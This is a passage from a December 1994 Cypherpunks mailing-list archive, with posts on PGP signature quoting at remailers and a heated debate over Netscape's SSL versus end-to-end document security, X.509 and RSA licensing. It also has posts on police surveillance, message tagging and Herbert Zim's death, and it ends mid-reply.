Date: Mon, 12 Dec 94 14:03:44 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To: <9412122147.AA17081@hodge-podge.MIT.EDU>
Message-ID: <9412122203.AA05754@nottingham.riskdev.ml.com>

>> From: Derek Atkins
>>
>> pgp is putting those extra "- " pieces in (guess you didn't read all
>> your pgp docs :-), it does that so that it can tell the difference between
>> pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines
>> beginning with a dot with an extra dot. the difference here is that
>> sendmail removes any leading dots before delivery and pgp doesn't after
>> removing a signature.
>> yeah, you do have to load it into an editor but
>> mailing something to a remailer should not "hork" it. the pgp running on
>> the remailer will just "- " the stuff and include it literally.
>
>Uhh, this is not at all true. When PGP verifies a message, it will
>strip out the quoting dashes in the output. This is documented in RFC
>822 (I think) about quoting messages.
>
>Just run the message through PGP and it will strip out the first level
>of quoting in the output message, and you should be able to then run
>PGP on the rest of the message as well.
>

but is a remailer (or pgp) smart enough to take the output from checking a signature and run pgp over it again? is it going to know to take something and pass it through pgp until pgp can't do anything with it any more? i think that's the problem that jrochkin was addressing. he has a pgp encrypted message and then signs it and then wants to mail it to a remailer so that the remailer can decrypt the message but it won't because the encryption is nested...

wasn't that it?

--
--< "CYBERBOY" >--
andrew at ml.com (Andrew Brown)
Phone: 1.212.449.0088
Fax: 1.212.449.8612

$400 million in gold bullion counter-intelligence FBI colonel Kennedy Treasury Honduras jihad Rule Psix Legion of Doom terrorist Khaddafi Uzi South Africa Peking

From hfinney at shell.portal.com Mon Dec 12 14:19:48 1994
From: hfinney at shell.portal.com (Hal)
Date: Mon, 12 Dec 94 14:19:48 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121231.ZM17395@warp.mcom.com>
Message-ID: <199412122219.OAA03950@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

"Kipp E.B. Hickman" writes:

>In article <9412111620.AA41983 at eldamar.walker.org>, [Amanda Walker] writes:
>> It is also
>> tied directly to the RSA certification hierarchy.
>> Now, for those of us
>> who have X.509 certificates rooted in the RSA Commercial Certification
>> authority, that's fine, but it also means that any other WWW client that
>> wishes to interoperate with Netscape's "secure servers" must license
>> TIPEM from RSA Data Security, and consequently pay RSA's rather high
>> royalties, unless the software is free (in which case RSAREF can be
>used).
>> This serves as a direct barrier to competition from other commercial
>> vendors. This is not all bad--I happen to like RSADSI's products and
>> technology--but promoting a transport-level security system instead of
>> an end-to-end one is to my mind simply irresponsible.

>This is an outright lie. We don't use TIPEM. You could build a
>conformant SSL implementation using RSAREF and the freeware IDEA
>cipher code.

What about the certification aspect? Would servers be forced to pay for an RSA key certification? This was a point I raised in my comments on SSL. PEM's reliance on the RSA-based certification hierarchy has at least slowed its progress if not doomed it altogether.

I understand that Netscape clients will embed certain Certification Authority keys and use them to validate signed server keys. Does this also mean that only RSA-approved CA's will be allowed? What if some CA in some other country not covered by RSA patents came into operation? Would your relationships with RSA still allow you to embed non-RSA-approved CA keys? I would hope so. RSA is both respected and mistrusted in the crypto community, so you wouldn't want to tie yourselves too closely to them.

Have you heard of the "web of trust" concept implemented by PGP? This allows users to designate chosen individuals as trusted key signers and to authenticate keys on that basis. It is non-hierarchical and decentralized. (There is also plenty of bad blood between RSA and PGP.) Will you be able to support decentralized authentication models like this? I hope this is something you will explore.
(I have no financial interests in any of these companies or protocols!)

Hal Finney

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLuzMQRnMLJtOy9MBAQEoyQH8CvFo2PzdB7fzn5TDSW52mZFpuu2HIt9d
YazndhCPcE349CxumMzwmrE9tVA9e/toEIysfSwcjubW1rOXX7Wrxw==
=189c
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Mon Dec 12 14:30:12 1994
From: hfinney at shell.portal.com (Hal)
Date: Mon, 12 Dec 94 14:30:12 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412122118.AA11047@snark.imsi.com>
Message-ID: <199412122229.OAA05451@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" writes:

>HTTP, like SMTP, is only a transport for underlying documents. The
>underlying documents are the things people wish to secure, not the
>transport layer. By securing only the transport, you make it possible
>for people to get pages that are forged, although they can be sure of
>what machine delivered them (which isn't significant). Your system is,
>for instance, useless in a proxy HTTP daemon environment.

I was going to say that an SSL-aware proxy daemon could play "man in the middle" and pass through the SSL handshaking messages which occur at connection time, so that the user client could authenticate the remote server, then communicate using a key shared with that server but which the proxy would not know.

But that won't work with SSL, I guess. The SSL handshaking goes on before any message data has been exchanged; in particular, before the URL is sent to the proxy to tell it what server to connect to. (Hiding URL's is one of the features of SSL.)

So in fact with SSL the only authentication possible is between proxy and user, and then between proxy and remote server. There doesn't seem to be a place in the protocol where the user could authenticate the remote server and create a key which would not be known to the proxy. This does seem to be a deficiency.
Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLuzO1hnMLJtOy9MBAQG+IgIAyZvvTpXB6dmCbEyrvLA65QeK4c5T8UNi
NAelFrZMEsb/NdS2l8ApczkljEnviCpOiV9W5ALYTKXr9nzJbSaZbg==
=eBkX
-----END PGP SIGNATURE-----

From prz at acm.org Mon Dec 12 14:33:23 1994
From: prz at acm.org (Philip Zimmermann)
Date: Mon, 12 Dec 94 14:33:23 PST
Subject: Herbert S. Zim dies
Message-ID:

Herbert S. Zim, author of over 100 children's books, including "Codes and Secret Writing", died at age 85 on December 5th in Plantation Key, Florida, where he has lived for many years. He had Alzheimer's disease.

I mention his passing because he wrote the first book I ever read on cryptography, which I read in 4th grade in 1964. If it weren't for Zim, I might not have created PGP.

-Philip Zimmermann

From perry at imsi.com Mon Dec 12 14:43:55 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 12 Dec 94 14:43:55 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121357.ZM17505@warp.mcom.com>
Message-ID: <9412122242.AA11210@snark.imsi.com>

"Kipp E.B. Hickman" says:
> First of all, let's start with "not wanting to secure the transport
> layer". Right now email, passwords, etc. can be read off of the
> internet in the clear providing no measure of privacy at all. I
> believe the SSL protocol solves this problem.

First of all, Mr. Hickman, you might notice that I said that encryption is needed for privacy. However, transport layer security is far from sufficient for the web because it DOES NOT SECURE THE DOCUMENTS. The fact that you mention email and SSL in the same paragraph demonstrates an ignorance of this topic. Because email is store and forward transport layer encryption mechanisms are worthless -- they only say that no one could read the last hop and in no way do they secure the documents themselves. That's why PEM was developed. There is now a merger of PEM and MIME that is soon going to be a proposed internet standard following the last IETF meeting.
Indeed, Mr Hickman, had you and your friends at Netscape been paying attention instead of rolling your own, you might have noticed that IPSP prototypes are around TODAY and that transport layer mechanisms are going to become rapidly obsolete for securing the communications themselves. You can find a version of swIPe, which is not quite IPSP but is fairly similar (and which is being hacked on so that it will conform) on ftp.csua.berkeley.edu; it's even modloadable on Suns. That's available TODAY.

> In some future land where IPNG or its cousins appear, then maybe
> SSL will be unnecessary.

Even were transport layer security needed, there are many other protocols for doing the exact same thing -- your solution is hardly new or interesting. Why not use an existing one instead of rolling Yet Another One? Of course, as I've repeatedly mentioned, network layer security is being used by many people today and will be standardised very soon -- probably before SSL.

> Finally, the system is perfectly usable in a proxy environment.

Sheer ignorance. In your system I must trust each and every hop between myself and the document, and I must also trust all the servers. With public key signatures on the documents themselves, as Amanda Walker mentioned, you then need trust nothing at all in order to know that documents are authentic.

> Secondly, SSL is not an end, but a beginning. Instead of waiting 10
> more years before the standards process gets around to inventing
> some old technology and codifying it, we have put something out.

I'm afraid that your technology is the old one, and as for "putting something out", as I mentioned network layer solutions are available for ftp TODAY. In source form. Immediately. Oh, and by the way, they don't incorporate such useless abortions as 40 bit RC4 keys.

> We have made the protocol public instead of proprietary

IPSP is also public. So what?

> > > > It is also
> > > > tied directly to the RSA certification hierarchy.
> >
> > I'll point out that X.509 is widely loathed in the internet community
> > -- it's X.509 that caused PEM to fall flat on its face and die.
>
> Loathed for what reason? Because it's a standard?

We also loathe CLNP. Do you propose to do all your network layer communications over CLNP because it, too, is an ISO standard? ISO standards are universally loathed in the internet community -- and for good reasons. Let's take X.509 as one example.

X.509 is tied into X.500 distinguished names. They are

1) Bulky
2) Do not map into DNS names
3) Cannot be mapped into the DNS.
4) Do not support the web of trust model.
5) Are difficult to build parsers for
6) Require bulky and often expensive X.500 directory systems to use effectively.

> You are whining.

No, I am correct. You are ignorant of the community you are working with.

> > Well, TCP/IP is available for free, but that's a horse of a different
> > color. I don't particularly like your security model, but I don't
> > object that strenuously to your use of TIPEM qua TIPEM. I do strongly
> > object to X.509, which is based on technologies entirely alien to the
> > internet. How do I look up an X.509 certificate in the DNS? Now, given
> > the Eastlake and Kaufman DNS security system, you can put keys in the
> > DNS if you use DNS names, but X.509 uses abortive ISO distinguished
> > names which are utterly unmappable into the DNS.
>
> Now this is a good point. This is the kind of space that the
> internet is heading into. How does authentication work in the larger
> scheme? We at Netscape have tackled a small piece of the problem
> space. But the larger picture remains unsolved.

I'm afraid the larger picture has been solved -- you just haven't been the ones solving it and you haven't been paying attention to the other people doing work in this area.

> Discussions about how to do this are welcome. Using DNS style
> technology sounds like a good place to start.
Perhaps if you guys had bothered to attend some of the security area meetings at an IETF or two and read up on existing art you would have already known about this topic.

> In addition, discussing how to solve the "DNS" problem would be
> profitable for all.

The solution is easy -- don't use X.509 certificates.

Perry

From warlord at MIT.EDU Mon Dec 12 14:46:36 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 12 Dec 94 14:46:36 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To: <9412122203.AA05754@nottingham.riskdev.ml.com>
Message-ID: <9412122245.AA17251@hodge-podge.MIT.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

To: andrew at riskdev.ml.com (Andrew Brown)
cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com
Subject: Re: extra dashes in PGP-related blocks?

> but is a remailer (or pgp) smart enough to take the output from checking
> a signature and run pgp over it again? is it going to know to take something
> and pass it through pgp until pgp can't do anything with it any more? i think
> that's the problem that jrochkin was addressing. he has a pgp encrypted
> message and then signs it and then wants to mail it to a remailer so that the
> remailer can decrypt the message but it won't because the encryption is
> nested...

Why would it have to? A plain remailer takes the input you give it, and replays it to the output. It doesn't modify the message in any way, so there is no problem.

A remailer that signs a message should take what you send it (no matter _HOW_ you sent it), sign that message wholesale, and then send out the signed message. This means that if you send it a PGP-signed message, the output message will have two signatures -- the outer signature being the signing remailer, and the inner signature (which is quoted by PGP at the remailer) is the signature on the original message. This is the correct behavior, and _SHOULD NOT_ be changed.
An anonymizing remailer _might_ want to take the output of a PGP message and pass that into the output, but that is a different function altogether.

I don't understand why a plain remailer should have to know anything about PGP if it is just doing remailing, and in any case it should never have to verify a PGP-signed message, unless that is the purpose of the remailer. And even if that IS the case, it should only unwrap the OUTERMOST wrapping from PGP -- it *SHOULD NOT* recursively try to collapse the PGP armors. That is NOT a remailer's job.

- -derek

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLuzSYzh0K1zBsGrxAQGR3gLDBxPn9cmWWvWwyRdlcYUlRs5LqMHjMkRa
lmOggyb2QmFS1+vEqJ2a1oUxdLJHzNcH4JxjBplDKASmG19Ixvkt1nIjkwGi3yzN
J02drrVGYJqs426qnQhxI8E=
=B6In
-----END PGP SIGNATURE-----

From tcmay at netcom.com Mon Dec 12 14:53:55 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Mon, 12 Dec 94 14:53:55 PST
Subject: Real-time surveillance of the police
In-Reply-To:
Message-ID: <199412122252.OAA05139@netcom19.netcom.com>

Topics I'll discuss: surveillance tapes of cops, localizer bandwidth needs, and digital timestamping.

There's _some_ Cypherpunks relevance here, as this thread deals with the issue of surveillance, self-surveillance, escrowed records, etc.

I have another point of view to add: I don't want to see my local cops have all of their actions videotaped and reviewed for quite another reason--I don't want a "mechanization" of the enforcement process!

Cops, for all of their faults, also have some positive personal characteristics: they use discretion in enforcing laws, they let folks off with warnings or shrugs, etc. I shudder to think about a world in which the hideously complicated legal code is enforced by cops who have video cameras mounted behind them to verify that they never gave a sucker^H^H^Hcitizen-unit a break.

(I am slightly reluctant to tell Sandy I have some good opinions of the California Highway Patrol, but I do.
I elected to take a one day class to get a speeding ticket taken off my record, and the class was taught by an extremely able, pragmatic retired CHP officer. He had all kinds of tips about driving, accidents, etc., having seen 500 or more fatalities in his 25+ years with the CHP. He also talked about the local judgment, or discretion, that CHP officers have to have. For example, to raise tax revenues, California ruled that "fix-it tickets" (no fee, no fine, just present evidence that a minor automobile flaw has been corrected) would no longer be allowed, that even the most minor infractions--broken tail-light, cracked windshield, etc.--would have to go through the legal process, with special soak-the-driver "administrative" (really, revenue enhancement) fees. So the CHP is simply not playing along, and they've found a way to avoid the process by issuing a different kind of ticket that is in fact a fix-it ticket. He also gave other examples that left me with a more favorable impression of cops....perhaps this was his intent?)

(The longer-than-I'd-planned section above is meant to show that even a cop-disliking skeptic like me can be convinced that some good is done by them, and that not all cops are bad. Perhaps my one-day exposure co-opted me the way certain folks in D.C. got co-opted?)

Anyway, I don't _want_ a mechanistic enforcement of *all* laws, with a video camera second-guessing the cop. I don't want 43,761 laws being enforced religiously. (If we had just the 13 or 14 laws I think we need, strict enforcement would be a good thing, but not when the 43,748 extra laws are cluttering up the books.)

"Officer, the video records of 1994-12-12 14:22:31 PST indicate your patrol unit was within visual range of a 324.986.666 ("Bicycle Helmet of Improper Color") and yet you ignored this misdemeanor. This being your 3rd such oversight this month, you are being reassigned to the Discipline Platoon at Camp Pendleton. Dismissed."
Forcing the cops to surveil themselves will almost certainly take away what enforcement discretion they now have.

Sandy Sandfort wrote:

(quoting someone else)
> ObCrypto/Privacy: I suspect there would be an immense
> amount of radio traffic involved in keeping track of a
> substantial group of people ... [I doubt] the ability of
> the receivers to digest it all in real time.
>
> (1) My suggestion was for (probably local) recording, not real
> time monitoring of video; therefore, no bandwidth problems.
>
> (2) Tim might want to comment, but my understanding of the
> localizer technology is that it too is somewhat "local" and that
> polling or burst transmission keeps the bandwidth requirements at
> manageable levels.

On this bandwidth point, it is certainly true that N localizers/transceivers communicating at M bits per second with some maximum carrier frequency can "overload" the "free space channel." (Crudely, when N x M > .5 B, where B is the "bandwidth" of the communications channel.)

For example, a million people each trying to communicate a thousand bits per second would imply an aggregate of a billion bits per second, barely possible if the carrier frequency maxes out at a few gigahertz. This is Shannon's Theorem, of course.

And this is within "one space," nearby. In the real world, with a few miles as the effective range, the "crowding" is not severe. (I'm ignoring other users, radio and t.v., cellular, RF noise, etc. Important things to consider in a more detailed calculation.)

Ten thousand such units, in a space a few miles square, each "trying" to communicate 1000 bits per second, would result in only about 10^7 bits per second, aggregate. This is far, far below any Shannon limits (of course, there are other users of the spectrum who may "step on" the users here...these are all tradeoffs to consider, and that _have_ been considered).

Fortunately, localization doesn't typically need 1000 bits per second, in any case.
(A skier lost in the mountains, a child who has wandered away....all are cases where the needed bits per second is _much_ less than 1000 bps. Indeed, most of the localizers are either not sending info at all, or very sporadically.)

Finally, the problem of "proving" the surveillance or audio/video records are not later changed by cops or others is easily solved--by something of great crypto relevance. Namely, digital time-stamping, a la Haber and Stornetta.

No "trusted third party storage" is needed: just hash the surveillance records a la Haber and Stornetta and the resulting published hash cannot at a later time be forged. (I devoted much space to this in the FAQ, so grep it for this if interested.)

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay

From db at Tadpole.COM Mon Dec 12 15:05:34 1994
From: db at Tadpole.COM (Doug Barnes)
Date: Mon, 12 Dec 94 15:05:34 PST
Subject: Broadcasts - addressing
In-Reply-To: <199412122127.QAA21293@bwnmr5.bwh.harvard.edu>
Message-ID: <9412122304.AA10973@tadpole.tadpole.com>

>
> |
> | I have been contemplating how to mark broadcast messages as being
> | 'for' someone. To foil traffic analysis, you don't want to include
> | their nym or key-id, for the sake of your poor CPU, you want to
> | avoid the need to attempt decryption on everything that passes through.
>
> Keys are cheap. Everyone should have a bunch. To foil
> TA, hand out a key to each correspondent.
> Give them id's like
> 'latex.limb.malaise '
>

Yes, but any set of messages sent under a particular key are linked for purposes of traffic analysis. You would need to hand out (potentially) a key per message, or stacks of keys. At which point, you're doing something very similar to what I suggested.

I personally think that it would be easier to manage fewer keys and use something very simple (like a large random number) for message tagging, but this is just me.

Doug

From kipp at warp.mcom.com Mon Dec 12 15:10:47 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Mon, 12 Dec 94 15:10:47 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412122242.AA11210@snark.imsi.com>
Message-ID: <9412121508.ZM17611@warp.mcom.com>

On Dec 12, 5:42pm, Perry E. Metzger wrote:
> Subject: Re: Clarification of my remarks about Netscape
>
> "Kipp E.B. Hickman" says:
> > First of all, let's start with "not wanting to secure the transport
> > layer". Right now email, passwords, etc. can be read off of the
> > internet in the clear providing no measure of privacy at all. I
> > believe the SSL protocol solves this problem.
>
> First of all, Mr. Hickman, you might notice that I said that
> encryption is needed for privacy. However, transport layer security is
> far from sufficient for the web because it DOES NOT SECURE THE
> DOCUMENTS. The fact that you mention email and SSL in the same
> paragraph demonstrates an ignorance of this topic. Because email is
> store and forward transport layer encryption mechanisms are worthless
> -- they only say that no one could read the last hop and in no way do
> they secure the documents themselves. That's why PEM was
> developed. There is now a merger of PEM and MIME that is soon going to
> be a proposed internet standard following the last IETF meeting.

Clearly you and I disagree on a fundamental point. Which is more important? Securing the document or securing the transport of the document.
I believe that today's problem for commerce is securing the transport. Solving this currently widespread problem makes the Internet a friendlier place for commerce. It allows sensitive information to be transported privately. Protecting against forgery is the next logical step.

> Indeed, Mr Hickman, had you and your friends at Netscape been paying
> attention instead of rolling your own, you might have noticed that
> IPSP prototypes are around TODAY and that transport layer mechanisms
> are going to become rapidly obsolete for securing the communications
> themselves. You can find a version of swIPe, which is not quite IPSP
> but is fairly similar (and which is being hacked on so that it will
> conform) on ftp.csua.berkeley.edu; it's even modloadable on Suns. That's
> available TODAY.

Let's pretend for a moment that you are right. IPSP is the way to go, today, and that silly us, we should have used it. So now I go to my site manager, and say:

Please replace all that fancy expensive network hardware with new ones that speak IPSP so that we can do private communications with...

So who can I talk to? Name one router that speaks the secure protocols you are documenting? Name one PPP based bridge that does? Show me, today, what percentage of the Internet is covered by these standards? Give me some growth curves showing how the Internet will quickly be converted to a secure network?

My point is not that IPSP is "bad". My point is that *today* it is irrelevant. Tomorrow is another matter. In the future, I hope that you are right, IPSP is everywhere and we can all breathe a sigh of relief. In this case SSL is of little value.

However, in the mean time we have what we have. My company's network hardware is typical. It is filled with expensive devices that don't understand IPSP or IPNG. In fact, most of the world is constructed this way. What you are implicitly asking for is for the world to replace its networking hardware/software solutions before allowing privacy.
I think that this is incorrect. SSL is a temporary solution to a nagging problem. Its design was predicated on the belief that the future is in protocols such as IPSP. Security will be pushed lower and lower until it is omnipresent.

> > In some future land where IPNG or its cousins appear, then maybe
> > SSL will be unnecessary.
>
> Even were transport layer security needed, there are many other
> protocols for doing the exact same thing -- your solution is hardly
> new or interesting. Why not use an existing one instead of rolling Yet
> Another One? Of course, as I've repeatedly mentioned, network layer
> security is being used by many people today and will be standardised
> very soon -- probably before SSL.

We never claimed the solution was new or interesting. However, it is a solution.

> > Finally, the system is perfectly usable in a proxy environment.
>
> Sheer ignorance. In your system I must trust each and every hop
> between myself and the document, and I must also trust all the
> servers. With public key signatures on the documents themselves, as
> Amanda Walker mentioned, you then need trust nothing at all in order
> to know that documents are authentic.

You are making the assumption that the proxy is able to understand the secure conversations between a client and its eventual server. This need not be true and should not be true.

> > Secondly, SSL is not an end, but a beginning. Instead of waiting 10
> > more years before the standards process gets around to inventing
> > some old technology and codifying it, we have put something out.
>
> I'm afraid that your technology is the old one, and as for "putting
> something out", as I mentioned network layer solutions are available
> for ftp TODAY. In source form. Immediately. Oh, and by the way, they
> don't incorporate such useless abortions as 40 bit RC4 keys.
You must have missed a line in the spec:

#define SSL_CK_RC4_WITH_MD5              0x01
#define SSL_CK_RC4_EXPORT40_WITH_MD5     0x02
#define SSL_CK_RC2_CBC_WITH_MD5          0x03
#define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04
#define SSL_CK_IDEA_CBC_WITH_MD5         0x05

Note the inclusion of plain RC4 (not 40 bit), plain RC2 (not 40 bit) and plain IDEA (again, not 40 bit).

If you have an exportable solution that can be manufactured in the US and then shipped overseas, then that is something of value. Complaining about 40 bit keys is not of value. The ITAR rules are what they are and at this point in time we can't change them.

> > We have made the protocol public instead of proprietary
>
> IPSP is also public. So what?
>
> > > > > It is also
> > > > > tied directly to the RSA certification hierarchy.
> > >
> > > I'll point out that X.509 is widely loathed in the internet community
> > > -- it's X.509 that caused PEM to fall flat on its face and die.
> >
> > Loathed for what reason? Because it's a standard?
>
> We also loathe CLNP. Do you propose to do all your network layer
> communications over CLNP because it, too, is an ISO standard? ISO
> standards are universally loathed in the internet community -- and for
> good reasons. Let's take X.509 as one example.
>
> X.509 is tied into X.500 distinguished names. They are
>
> 1) Bulky
> 2) Do not map into DNS names
> 3) Cannot be mapped into the DNS.
> 4) Do not support the web of trust model.
> 5) Are difficult to build parsers for
> 6) Require bulky and often expensive X.500 directory systems to use
> effectively.

Not true. Distinguished names can be bulky, but you don't have to use them that way. They can be made to map into DNS names trivially, and because you don't have to have a single root, a web of trust is perfectly possible. Examine how PGP self signed public keys are managed. Finally, "bulky and often expensive" is a matter of opinion.
Please define a solution that is:

    distributed
    reliable
    supports an unforgeable name to public-key mapping
    standard
    not-bulky
    not-expensive

I will be the first to sign up and buy one. The market exists.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com           http://www.mcom.com/people/kipp/index.html

From amanda at intercon.com Mon Dec 12 15:14:18 1994
From: amanda at intercon.com (Amanda Walker)
Date: Mon, 12 Dec 94 15:14:18 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <9412121811.AA55359@amanda.dial.intercon.com>

[I'm sending this to the list because it does have some crypto content]

"Kipp E.B. Hickman" writes:
> > There is no need to bypass existing efforts just to add cosmetic value to
> > your own software.
> This has nothing to do with security...

Agreed. My annoyance with Netscape is not based solely, or even primarily, on security concerns. In fact, my only annoyance with your security proposal is that it is at the wrong layer (or, more accurately, at a layer which should be secondary). In my view, you picked the right technology, but applied it to the wrong problem :).

> Clearly I'm an idiot. Explain it to me.

SSL is a mechanism whereby a client and a server can establish a secure, authenticated transport channel. The problem is that this isn't what I want to secure and authenticate. Most of the time, in fact, I don't care about the transport: I may be talking through a proxy (like the current CERN httpd), or bringing things in from a cache, or talking to a load-balanced server array. I want the *documents* I'm accessing to be secure and/or authenticated. I want my HTML documents signed and certified by the *author*, not the server. I couldn't care less about the server if I can verify that I've got the right document in response to my query.
Similarly, if I send the contents of a form containing, say, my Amex number, I want to encrypt the session key with the public key of the merchant, not the service provider. This is what I (and many others) mean by an "end to end security model." Transport security is a nice secondary ability (it helps defend against traffic analysis, for example, and casual snooping by students with packet sniffers), but without end-to-end security, it's simply a way of providing a false sense of security. I wouldn't want to do away with the TCP checksum field simply because the modem I use for my SLIP link is "error-correcting," and I feel the same way about security. > I put my email address in there for that very reason. Jeesh. I'd rather that technical feedback occur in a public forum like the IETF. I have no pretensions about being a security expert, and I want people to shoot down my bad ideas too. Heck, I *like* having my competitors tell me what's wrong with my ideas :). > > This serves as a direct barrier to competition from other commercial > > vendors. > This is an outright lie. We don't use TIPEM. You could build a > conformant SSL implementation using RSAREF and the freeware IDEA > cipher code. Nope, not if I want to sell it (note the word "commercial" in my comment). RSAREF cannot be used for commercial software, nor can IDEA under the PGP license. There is no feasible way to license the RSA patents for commercial use except by licensing TIPEM. I have been told this outright by Kurt Stammberger of RSADSI (their VP of marketing, I believe). This is not secondhand information. All commercial software that I know of using RSA public key encryption and RSA stream ciphers (such as RC2 and RC4) uses TIPEM and BSAFE, including Lotus Notes and Apple PowerTalk. RSA's royalty structure is based on a percentage of revenue, with the percentage on a sliding scale based on gross corporate revenue (not just on products which use RSA's patents). 
If you keep your margins low to compete in the marketplace, you lose. Even you folks are making your money on high-margin products (servers) rather than low-margin ones (clients), I'd wager at least in part because it's a way to make money despite having to pay RSA royalties. The RSAREF license has been loosened up some recently, but it's still restricted to freeware. > As for a barrier to competition. So what else is new? We > all have barriers to overcome before we can compete. Should we get rid of > TCP/IP as a barrier to using the web? I don't have to pay royalties to sell an implementation of TCP/IP. Your analogy fails. > You are somewhat right here. In fact, this was done because we are a company > interested in surviving long enough to withstand the eventual attack > by microsoft. You've already got your eggs in the right basket on this one--sell servers and services, not client software. Microsoft has a miserable track record in the server arena (witness the underwhelming success of Windows NT :)). It's also less of a commodity market, which is where Microsoft excels (no pun intended). > As a result we received critical review > from some decent members of the crypto community, including: > > Martin Abadi > Mike Burrows > Alan Schiffman > Matt Robshaw > Burt Kaliski Mostly RSADSI people, by my count. Great technical background, but I wouldn't call relying on one of your technology vendors "peer review"... > As for the IETF standards process, we are pushing the > document into the RFC process. Precisely. Rather than working with others in the industry and research communities, you are trying to push your proposal into the standards track. > The market will decide one way or the other. On this I agree completely. Amanda Walker From perry at imsi.com Mon Dec 12 15:23:47 1994 From: perry at imsi.com (Perry E. 
Metzger) Date: Mon, 12 Dec 94 15:23:47 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121508.ZM17611@warp.mcom.com> Message-ID: <9412122322.AA11307@snark.imsi.com> "Kipp E.B. Hickman" says: > Clearly you and I disagree on a fundamental point. Which is more > important? Securing the document or securing the transport of the > document. I believe that today's problem for commerce is securing > the transport. I believe there is a fundamental problem of understanding here -- it does not seem that you understand how store and forward email works. Securing just the transport is less than useless. > Solving this currently widespread problem makes the > Internet a friendlier place for commerce. It allows sensitive > information to be transported privately. No, it does not -- it just means that some links can't be read. On the other hand, PEM/MIME-PEM *ALREADY* keep people from reading no matter whether the link is open or not open. > Let's pretend for a moment that you are right. IPSP is the way to > go, today, and that silly us, we should have used it. So now I go to > my site manager, and say: > > Please replace all that fancy expensive network hardware with new > ones that speak IPSP so that we can do private communications with... You don't have to replace any hardware. More ignorance on your part. > So who can I talk to? Name one router that speaks the secure > protocols you are documenting? Each and every one routes it today. I have routed swIPe packets over the commercial internet -- and of course I couldn't control any of the intervening routers. Your comments indicate that you are totally unaware of how IPSP is designed to work. You are ignorant and foolish. You could at least read a document or two before making statements that make you sound stupid. I read your documents. You could at least read other peoples -- but that would naturally require that you even realize that other people have done work on this topic. 
> > Even were transport layer security needed, there are many other
> > protocols for doing the exact same thing -- your solution is hardly
> > new or interesting. Why not use an existing one instead of rolling Yet
> > Another One? Of course, as I've repeatedly mentioned, network layer
> > security is being used by many people today and will be standardised
> > very soon -- probably before SSL.
>
> We never claimed the solution was new or interesting. However, it is a
> solution.

Yet Another Solution. Why not invent your own internet protocol? After all, it would be a "solution".

> You must have missed a line in the spec:
>
> #define SSL_CK_RC4_WITH_MD5 0x01
> #define SSL_CK_RC4_EXPORT40_WITH_MD5 0x02
> #define SSL_CK_RC2_CBC_WITH_MD5 0x03
> #define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04
> #define SSL_CK_IDEA_CBC_WITH_MD5 0x05

Gee, I was under the impression that that was CODE, not SPEC.

> Not true. Distinguished names can be bulky, but you don't have to
> use them that way.

What other way could you use?

> They can be made to map into DNS names trivially,

How? Name a single methodology.

> Please define a solution that is:
>
> distributed
> reliable
> supports an unforgeable name to public-key mapping
> standard
> not-bulky
> not-expensive
>
> I will be the first to sign up and buy one. The market exists.

Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL isn't standard either) for the packet layer. Use some variant of Photuris for key distribution. All the software in question is publicly available or will be and will run on a wide variety of platforms.

Perry

From perry at imsi.com Mon Dec 12 15:26:43 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 12 Dec 94 15:26:43 PST
Subject: oh, and by the way...
Message-ID: <9412122326.AA04464@webster.imsi.com>

I forgot one element of my proposed alternative to SSL.
For securing HTML documents themselves, use something like the new IETF security multiparts standard, which is suitable for protecting MIME encapsulated documents. .pm From kipp at warp.mcom.com Mon Dec 12 15:34:05 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 15:34:05 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121811.AA55359@amanda.dial.intercon.com> Message-ID: <9412121532.ZM17644@warp.mcom.com> On Dec 12, 6:11pm, Amanda Walker wrote: > Subject: Re: Clarification of my remarks about Netscape > [I'm sending this to the list because it does have some crypto content] > > "Kipp E.B. Hickman" writes: > > > There is no need to bypass existing efforts just to add cosmetic value to > > > your own software. > > > This has nothing to do with security... > > Agreed. My annoyance with Netscape is not based solely, or even primarily, > on security concerns. In fact, my only annoyance with your security > proposal is that it is at the wrong layer (or, more accurately, at layer > which should be secondary). In my view, you picked the right technology, > but applied it to the wrong problem :). > > > Clearly I'm an idiot. Explain it to me. > > SSL is a mechanism whereby a client and a server can establish a secure, > authenticated transport channel. The problem is that this isn't what I want > to secure and authenticate. Most of the time, in fact, I don't care about > the transport: I may be talking through a proxy (like the current CERN httpd), > or bringing things in from a cache, or talking to a load-balanced server > array. I want the *documents* I'm accessing to be secure and/or > authenticated. I want my HTML documents signed and certified by the *author*, > not the server. I couldn't 